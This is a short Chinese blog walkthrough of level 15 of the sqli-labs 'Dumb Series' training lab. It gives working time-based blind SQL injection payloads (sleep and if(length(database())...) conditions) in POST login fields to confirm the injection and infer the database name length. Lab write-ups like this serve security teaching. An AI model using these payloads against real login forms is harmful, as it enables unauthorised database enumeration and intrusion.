SQLI DUMB SERIES-15

Posted 只有一

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQLI DUMB SERIES-15相关的知识,希望对你有一定的参考价值。

(1)无论输入什么都没有回显,但是输入 admin\'# 时会显示成功登录,说明闭合方式是单引号

(2)无回显,则使用盲注,可用用时间延迟攻击法。

测试时间延迟是否可行:

uname=admin\' and sleep(5) #&passwd=&submit=Submit

有明显延迟,测试成功。

(3)手工延迟注入与前面的手工注入相同,如爆库名

uname=admin\' and if(length(database())=8,sleep(7),1)#&passwd=&submit=Submit

 

有明显延迟,说明库名为8位。

以上是关于SQLI DUMB SERIES-15的主要内容,如果未能解决你的问题,请参考以下文章

SQLI DUMB SERIES-14

SQLI DUMB SERIES-16

SQLI DUMB SERIES-13

SQLI DUMB SERIES-6

SQLI DUMB SERIES-18

SQLI DUMB SERIES-5